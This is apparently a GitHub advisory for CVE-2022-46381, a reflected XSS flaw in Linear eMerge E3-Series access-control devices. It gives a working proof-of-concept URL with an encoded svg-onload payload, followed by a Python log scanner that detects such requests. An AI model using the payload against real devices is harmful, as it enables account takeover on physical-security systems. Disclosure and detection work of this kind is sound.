CVE-2022-46381: Security-Research/CVE-2022-46381.txt at main · omarhashem123/Security-Research

Certain Linear eMerge E3-Series devices are vulnerable to XSS via the type parameter (e.g., to the badging/badge_template_v0.php component). This affects 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e.


# Exploit Title: Linear eMerge E3-Series devices are vulnerable to XSS via the “type” parameter

# Exploit Author: Omar Hashim

# Version: 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e

# Vendor home page: https://na.niceforyou.com/brands/linear/

# Vendor home page: https://www.nortekcontrol.com/access-control/

# Vendor home page: https://linear-solutions.com/

# Authentication Required: No

# CVE : CVE-2022-46381

# Description

====================

Linear eMerge E3-Series devices were discovered to contain a reflected XSS vulnerability via the “type” parameter, which can be chained with local session fixation to take over admin or less-privileged user accounts.

# Proof Of Concept:

====================

http://<HOST:PORT>/badging/badge_template_v0.php?layout=1&type=%22%2F%3E%3Csvg%2Fonload%3D%22alert%28cookie%29%22%2F%3E
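
A defender-side check for the request pattern shown above, as an added example that is not part of the original advisory: it scans access-log lines for requests to the affected path whose decoded `type` value contains HTML markup characters, including double-encoded ones. The combined log format, the sample log lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

VULN_PATH = "/badging/badge_template_v0.php"   # component named in the advisory
MARKUP = re.compile(r"[<>\"']")                # chars needed to leave an attribute or open a tag
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (combined log format assumed; addresses are documentation IPs).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2023:10:00:00 +0000] "GET /badging/badge_template_v0.php?layout=1&type=1 HTTP/1.1" 200 512
192.0.2.44 - - [01/Jan/2023:10:00:05 +0000] "GET /badging/badge_template_v0.php?layout=1&type=%22%2F%3E%3Csvg%2Fonload%3D%22alert%28cookie%29%22%2F%3E HTTP/1.1" 200 530
192.0.2.44 - - [01/Jan/2023:10:00:09 +0000] "GET /badging/badge_template_v0.php?layout=1&type=%253Cb%253E HTTP/1.1" 200 520
192.0.2.10 - - [01/Jan/2023:10:00:12 +0000] "GET /index.php?type=%3Cb%3E HTTP/1.1" 200 100
""".splitlines()

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded values are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_type_values(log_line):
    """Return decoded `type` values containing markup, for requests to VULN_PATH only."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if unquote(url.path) != VULN_PATH:
        return []
    params = parse_qs(url.query, keep_blank_values=True)  # decodes once
    values = (decode_fully(raw) for raw in params.get("type", []))
    return [v for v in values if MARKUP.search(v)]

def scan(lines):
    """Return (line_number, values) for every log line with a suspicious `type`."""
    hits = []
    for number, line in enumerate(lines, start=1):
        values = suspicious_type_values(line)
        if values:
            hits.append((number, values))
    return hits

if __name__ == "__main__":
    for number, values in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious type value(s): {values}")
```

Because the advisory lists authentication as not required, matches should be reviewed even when no session identifier is logged alongside the request.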
